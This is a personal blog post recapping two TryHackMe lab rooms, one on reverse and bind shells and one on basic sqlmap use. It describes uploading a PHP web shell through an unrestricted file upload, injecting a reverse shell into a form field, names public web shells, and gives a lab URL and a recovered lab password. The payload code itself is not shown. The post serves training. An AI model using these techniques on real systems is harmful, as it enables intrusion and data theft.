Today we move onto Shells Overview via THM which as the name may suggest, is all about shells!
The module covers an overview of reverse and bind shells and how the function, as well as various types which can be deployed in various instances.
The room also covers various listeners such as the standard netcat, ncat, socat and various others (there seems to be a running theme for these listeners and the naming conventions)!
The module covers various types of payloads such as PHP, Python, Bash, Telnet, Busybox & AWK (I have heard of AWK but never used it in this context).
The module also included some useful links to references –
p0wny-shell – A minimalistic single-file PHP web shell that allows remote command execution.
b374k shell – A more feature-rich PHP web shell with file management and command execution, among other functionalities.
c99 shell – A well-known and robust PHP web shell with extensive functionality.
The final task of this module was two fold, the first of the two flags that needed to be captured involved an unrestricted web file upload vulnerability which I exploited via a php webshell –
The above PHP webshell allowed me to navigate to the directory of which is was upload in /uploads/webshell.php and then issues commands ‘cmd’ via the ? in the URL and the flag was claimed.
The second reverse shell was gained in the following way –
In the above example, I used a pipe reverse shell (which I didn’t think would work initially) straight into the hash file box on the web application which worked and then allowed me to get the call back to my netcat listener which then gave me shell access to the box and then accessed the flag.
Overall, a good room with good examples and reinforcement of concepts!
Next we moved on to the SQLMap: The Basics room!
This room runs through the basics of the sqlmap tool which is a great tool for checking web applications for SQL Injection.
As the room progresses it shows how to use the tool to show databases, tables and various other tips and tricks.
The final questions within the room ask the users to find the GET request for the login form within the web page which is found via the network tab in the browser tools as it is not displayed within the URL as normal GET requests are.
From there the request is – http://10.10.71.198/ai/includes/user_login?email=test&password=test
We use this request via sqlmap to show the databases present using the –dbs flag which shows there is six databases in use.
Then we find the table which is associated with the ‘ai’ database which was found and lastly the user is tasked with finding the password for email ‘[email protected]?’ which turns out to be 12345678!
Short room but quite a good refresher to the tool which I haven’t used it quite some time!
Until next time & don’t sleepwalk through life!
Bayi